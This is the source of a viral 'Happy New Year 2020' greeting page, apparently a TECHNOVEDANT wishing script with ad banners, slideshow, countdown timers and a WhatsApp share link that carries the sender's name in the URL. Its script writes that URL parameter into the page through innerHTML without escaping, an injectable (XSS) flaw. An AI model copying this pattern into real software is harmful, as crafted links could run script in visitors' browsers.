<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-VOftdFhYdEg/XekHzTFchDI/AAAAAAAADI8/mOvnFbG-3a4L1cJcA7CXKxN1esOUlAXMwCLcBGAsYHQ/s1600/SideBalloon.png" height="129px" width="35px"/><br><br>
<img src="https://1.bp.blogspot.com/-YUT93Sg1rdo/XekKENbBtXI/AAAAAAAADJM/BekodzyGo1ohHBArEz-vdAqiRX2ezJe8QCLcBGAsYHQ/s1600/SideFlower.png" height="129px" width="35px"/><br><br>
</marquee>
</center> 


  <div class="Technovedantncontainer">

    <div class="TechnoVedant-main-greeting">

<div style="background: url(https://2.bp.blogspot.com/-T_tXR3JA5mk/W5-lhCTz4jI/AAAAAAAACRc/nqUIwYh7dNc-llDLOKfY0837pxPaoqs7QCLcBGAs/s1600/Navratri%2Bfree%2Bfestival%2Bwishing%2Bwebsite%2Bscript%2Bfor%2Bblogger%2B2018%2Bpro%2Bscript%2Bdownload%2Band%2Bearn%2Bmoney%2Bstrip.png); background-color: white; color: white; font-weight: bold; padding-top: 0px; padding-bottom: 0px; font-size: 12;text-align:center; ">
<font color="white"> <p id="TECHNOVEDANT"></p>
</font></div>

<div style="background: url(https://1.bp.blogspot.com/-lNt2L8ZS3_4/XekNPWJNo6I/AAAAAAAADJY/AjPbCvJS9_gcJ3Pzo0451L4VQ7ahGSv9wCLcBGAsYHQ/s320/RedGlitter.gif); background-color: black; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">

<h2 class="font-effect-neon" align=center" id="TECHNOVEDANT-show-name"></h2>
</div>
<div style="background: url(https://2.bp.blogspot.com/-T_tXR3JA5mk/W5-lhCTz4jI/AAAAAAAACRc/nqUIwYh7dNc-llDLOKfY0837pxPaoqs7QCLcBGAs/s1600/Navratri%2Bfree%2Bfestival%2Bwishing%2Bwebsite%2Bscript%2Bfor%2Bblogger%2B2018%2Bpro%2Bscript%2Bdownload%2Band%2Bearn%2Bmoney%2Bstrip.png); background-color: black; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">
</font></div>
        <div class="font-effect-neon"><p class="fromMessage" id="TECHNOVEDANT-fromMessage"></p></div>
        


</center>
 <center><span style="color: #ffffff;">▁ ▂ ▄ ▅ नव वर्ष की हार्दिक शुभकामनायें ▅ ▄ ▂ ▁</center><br>

<center><img src="https://1.bp.blogspot.com/-JksJM2RCQts/XejxzTTbysI/AAAAAAAADH8/l-8ozQgZZl8TT-NwZKK559cQjgv3_S85QCLcBGAsYHQ/s320/Happy-New-Year-2020.png" class="img-responsive" alt="TECHNOVEDANT" width="95%"></center><br>
     <center>
    
<font color="white"><script type="text/javascript" src="//uprimp.com/bnr.php?section=General&pub=745846&format=300x50&ga=g&mbtodb=1"></script>
<noscript><a href="https://yllix.com/publishers/745846" target="_blank"><img src="//ylx-aff.advertica-cdn.com/pub_zn9ugf.png" style="border:none;margin:0;padding:0;vertical-align:baseline;" /></a></noscript></font>


</center>

<div class="vi" style="text-align: center;">

<br>
     <div style="background-color: #FF0000; border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: white; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 80%;">
<marquee behavior="alternate"><b>
Song को ज़रूर Play करें
</b></marquee>
</div>
<div style="background-color: #FFFF00; border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: black; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 80%; scrollamount="5">
<marquee behavior="alternate"><b>
Happy New Year 
</b></marquee>
</div>
</div><br>
<audio controls autoplay>
  <source src="https://www.technovedant.com/wp-content/uploads/2019/12/Happy_New_Year_2020-1.mp3" type="audio/mpeg">
  Your browser does not support the audio element.
</audio>
</br>
<center><img src="https://1.bp.blogspot.com/-wBbLcO_Kjs0/XejzPkdsxWI/AAAAAAAADII/Tc5dLLXXMyYwzJBf2p-8hgai9mqawbcagCLcBGAsYHQ/s320/Happy-New-Year.gif" class="img-responsive" alt="TECHNOVEDANT" width="95%"></center>
</br>
<center>

<font color="white"><script type="text/javascript" src="//uprimp.com/bnr.php?section=General&pub=745846&format=300x250&ga=g"></script>
<noscript><a href="https://yllix.com/publishers/745846" target="_blank"><img src="//ylx-aff.advertica-cdn.com/pub/300x250.png" style="border:none;margin:0;padding:0;vertical-align:baseline;" /></a></noscript></font>
                   
</center>
</br>
<center>
<h3><span><font color="white">Wave a goodbye to the old and embrace </font></span><br>
<span><font color="white">the new with full of hope,</font></span><br>
<span><font color="white">dream and ambition.</font></span><br>
<font color="white">Wishing you a happy new year full of happiness!</font></span>
</h3>
</center>
</br>
<center><img src="https://1.bp.blogspot.com/-LH9BYd01bas/Xej2YuYvHvI/AAAAAAAADIU/l38L8oJVg-guWYDw5mgSyuSl5VTQZdOjgCLcBGAsYHQ/s320/Happy-New-Year-2020-Photo.png" class="img-responsive" alt="TECHNOVEDANT" width="95%"></center>
</br>
<center>

<font color="white"><script type="text/javascript" src="//uprimp.com/bnr.php?section=General&pub=745846&format=300x50&ga=g&mbtodb=1"></script>
<noscript><a href="https://yllix.com/publishers/745846" target="_blank"><img src="//ylx-aff.advertica-cdn.com/pub_zn9ugf.png" style="border:none;margin:0;padding:0;vertical-align:baseline;" /></a></noscript></font>

</center>
</br>
<center>
<h3><span><font color="white">I hope your life will be full of surprise and joy in the new year,</font></span>
<span><font color="white">that’s about to begin.</font></span><br>
<span><font color="white">May You be blessed with everything you want in life.</font></span><br>
<span><font color="white">But a wish can glow days forever, </font></span><br>
<font color="white">Happy New Year 2020.</font></span>
</h3>
</center>
</br>

<div class="TECHNOVEDANT-slideshow-container">
<div class="TECHNOVEDANTSlides fade">
  <img src="https://1.bp.blogspot.com/-Fg0SO4hpohQ/XekFj3MqflI/AAAAAAAADIk/TGzojlreV4ErkAySOywCFImP_MDEw4keACLcBGAsYHQ/s1600/Happy-New-Year-Slideshow1.png" style="width:280px;height:280px;-webkit-border-radius: 0px 0px 0px 0px;-moz-border-radius: 0px 0px 0px0px;border-radius: 0px 0px 0px 0px;border:1px solid #ff6600;background:rgba(32,43,27,0.4);-webkit-box-shadow: #B3B3B3 3px 4px 3px;-moz-box-shadow: #B3B3B3 3px 3px 3px; box-shadow: #B3B3B3 3px 3px 3px;"/>
  
</div>

<div class="TECHNOVEDANTSlides fade">
  <img src="https://1.bp.blogspot.com/-xfnQJA2n5HA/XekFj8buDdI/AAAAAAAADIg/OAM-Q79kj5Uoh7cbz06jIMyT4oXGbFcHwCLcBGAsYHQ/s1600/Happy-New-Year-Slideshow2.png" style="width:280px;height:280px;-webkit-border-radius: 0px 0px 0px 0px;-moz-border-radius: 0px 0px 0px0px;border-radius: 0px 0px 0px 0px;border:1px solid #ce082c;background:rgba(32,43,27,0.4);-webkit-box-shadow: #B3B3B3 3px 4px 3px;-moz-box-shadow: #B3B3B3 3px 3px 3px; box-shadow: #B3B3B3 3px 3px 3px;"/>
  
</div>

<div class="TECHNOVEDANTSlides fade">
  <img src="https://1.bp.blogspot.com/-KC9fIrNJU80/XekFj7EBhWI/AAAAAAAADIo/Jp9suskF86IILB-uwrYHA7B--IbcGQUsACLcBGAsYHQ/s1600/Happy-New-Year-Slideshow3.png" style="width:280px;height:280px;-webkit-border-radius: 0px 0px 0px 0px;-moz-border-radius: 0px 0px 0px0px;border-radius: 0px 0px 0px 0px;border:1px solid #063dc9;background:rgba(32,43,27,0.4);-webkit-box-shadow: #B3B3B3 3px 4px 3px;-moz-box-shadow: #B3B3B3 3px 3px 3px; box-shadow: #B3B3B3 3px 3px 3px;"/>
  
  
</div>
</div>
<br>
     <div style="background-color: #FF0000; border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: white; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 80%;">
<marquee behavior="alternate"><b>
Dance Ke liye Video Play Kare
</b></marquee>
</div>
<br>
<center><iframe width="95%" height="315" src="https://www.youtube.com/embed/QNUpIl8gnR0" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
<br>
<center><img src="https://3.bp.blogspot.com/--VrLDvTMfE0/W2xAmnbAbSI/AAAAAAAABo0/g6rPQo521MASQKKAnw2LLed-OR1OlgF9gCLcBGAs/s1600/c.gif" class="img-responsive" alt="TECHNOVEDANT" width="30%"></center>
<br><br>

<div style="text-align:center">
  <span class="TECHNOVEDANTdot"></span> 
  <span class="TECHNOVEDANTdot"></span> 
  <span class="TECHNOVEDANTdot"></span> 
  <span class="TECHNOVEDANTdot"></span>
  <span class="TECHNOVEDANTdot"></span>
  <span class="TECHNOVEDANTdot"></span>
  <span class="TECHNOVEDANTdot"></span>
  <span class="TECHNOVEDANTdot"></span>
  <span class="TECHNOVEDANTdot"></span>
</div>




<script>
var slideIndex = 0;
showSlides();

function showSlides() {
    var i;
    var slides = document.getElementsByClassName("TECHNOVEDANTSlides");
    var dots = document.getElementsByClassName("TECHNOVEDANTdot");
    for (i = 0; i < slides.length; i++) {
       slides[i].style.display = "none";  
    }
    slideIndex++;
    if (slideIndex > slides.length) {slideIndex = 1}    
    for (i = 0; i < dots.length; i++) {
        dots[i].className = dots[i].className.replace(" active", "");
    }
    slides[slideIndex-1].style.display = "block";  
    dots[slideIndex-1].className += " active";
    setTimeout(showSlides, 4000); // Change image every 4 seconds
}
</script>
<div id="formBox" >
          <input type="text" name="name" id="nameTextBox"  placeholder="Enter Your Name">
          <div id="goButton" onclick="createGreeting()" >
          Click
          </div>
        </div>
        <a class="footerbtn" href="javascript:void(0)" onclick="shareActionWA()">
          <img width="25px" height="25px" src="https://2.bp.blogspot.com/-wqIwcDNHuLo/W1GSWn4DM7I/AAAAAAAABYk/7uT-lBuXTC0dMt86JLCmVoHKGWKBlClvQCLcBGAs/s1600/technovedan1.png">
          <b style="font-size: 15px;position:  relative;top: -3px;margin: 0 10px;">Share with your Friends</b>
          <img width="25px" height="25px" src="https://2.bp.blogspot.com/-wqIwcDNHuLo/W1GSWn4DM7I/AAAAAAAABYk/7uT-lBuXTC0dMt86JLCmVoHKGWKBlClvQCLcBGAs/s1600/technovedan1.png">
        </a>
    </div>
        
  </body>

  <script>
      var jqs = function(sParam) {
        var sPageURL = window.location.search.substring(1);
        var sURLVariables = sPageURL.split("&");
        for (var i = 0; i < sURLVariables.length; i++) {
            var sParameterName = sURLVariables[i].split("=");
            if (sParameterName[0] === sParam) {
              return sParameterName[1];
            }
          }
      };
    window.jqs = jqs;
    var name = decodeURI(jqs("bl"));
    if (typeof jqs("bl") === "undefined") {
      name = "";
    }
    var checkName = function() {
      if (name.length !== 0) {
        name = name.replace(/-/g, " ");
        console.log("name is there", name);
        document.querySelector("#TECHNOVEDANT-show-name").innerHTML = name;
        document.querySelector("#TECHNOVEDANT-fromMessage").innerHTML= "Wishing You"
      } else {

      }
    };

    checkName();

    var createGreeting=function(){

      // ga('send', {
      //   hitType: 'event',
      //   eventCategory: 'interaction',
      //   eventAction: 'click',
      //   eventLabel: 'goButtonClicked'
      // });

      gtag('event', 'click', {
            'event_category': 'interaction',
            'event_label': 'goButtonClicked',
      });

      sname=document.querySelector("#nameTextBox").value;
      sname=sname.replace(/@/g,"-")
      sname=sname.replace(/%40/g,"-")
      sname=sname.replace(/\./g,"-")
      if(sname.trim()!=""){
        document.querySelector("#formBox").style.display = "none";
        document.querySelector(".footerbtn").style.display = "block";
        document.querySelector("#TECHNOVEDANT-show-name").innerHTML = sname;
        document.querySelector("#TECHNOVEDANT-fromMessage").innerHTML= "Click on the WhatsApp button to share with your friends";
        window.scrollTo(0,0);
      }else {
        alert ("Please Type Your Name First");
        document.getElementById("nameTextBox").focus();
      }
    }

    var shareActionWA = function() {
      gtag('event', 'click', {
            'event_category': 'interaction',
            'event_label': 'shareOnWhatsAppClicked',
      });

      var shareString = "";
      var whatsappHref;
      shareString += "*"+sname+"*";

      
      shareString +=" wishing you a very happy new year to you and your family. I will hope that this 2020 will be your most Happy Year of your life. This Coming Year may you have Happiness, good health, prosperity and finally realize how awsome I really am! Like birds, let us leave behind what we don't need to carry, grudges sadness, pain, fear and regrets. Life is beautiful, enjoy it. HAPPY NEW YEAR 2020%0A👉"
      shareString +=(window.location.href.split("?")[0] + "?bl=" + sname).replace("#", "").replace(/ /g, "-");
     

      whatsappHref = "whatsapp://send?text=" + shareString;
      window.location.href = whatsappHref;

    };
    var countDownDate = new Date("Jan 01, 2020 00:00:00").getTime();

    // Update the count down every 1 second
    var x = setInterval(function() {
        // Get todays date and time
        var now = new Date().getTime();

        // Find the distance between now an the count down date
        var distance = countDownDate - now;

        // Time calculations for days, hours, minutes and seconds
        var days = Math.floor(distance / (1000 * 60 * 60 * 24));
        var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
        var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
        var seconds = Math.floor((distance % (1000 * 60)) / 1000);

        // Output the result in an element with id="demo"
        document.getElementById("demoo").innerHTML = days + "days " + hours + "hr "+ minutes + "min " + seconds + "sec ";

        // If the count down is over, write some text
        if (distance < 0)
         {
            clearInterval(x);
            document.getElementById("demoo").innerHTML = "";
            document.getElementById("inAdvance").innerHTML = "";

        }
    }, 1000);
  </script>
<!-- Display the countdown timer in an element -->


<script>
// Set the date we're counting down to
var countDownDate = new Date("Jan 01, 2020 00:00:00").getTime();

// Update the count down every 01 second
var x = setInterval(function() {

  // Get todays date and time
  var now = new Date().getTime();

  // Find the distance between now an the count down date
  var distance = countDownDate - now;

  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

  // Display the result in the element with id="TECHNOVEDANT"
  document.getElementById("TECHNOVEDANT").innerHTML = days + "<i> Days,</i> " + hours + " <i>Hrs,</i> "
  + minutes + "<i> Min,</i> " + seconds + "<i> Sec</i> ";

  // If the count down is finished, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("TECHNOVEDANT").innerHTML = ".";
  }
}, 1000);
</script>        
<script src="https://www.googletagmanager.com/gtag/js?id=UA--1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA--1');
  // ga('create', 'UA--1');
  // ga('require', 'linker');
  // ga('send', 'pageview');
</script>
</html>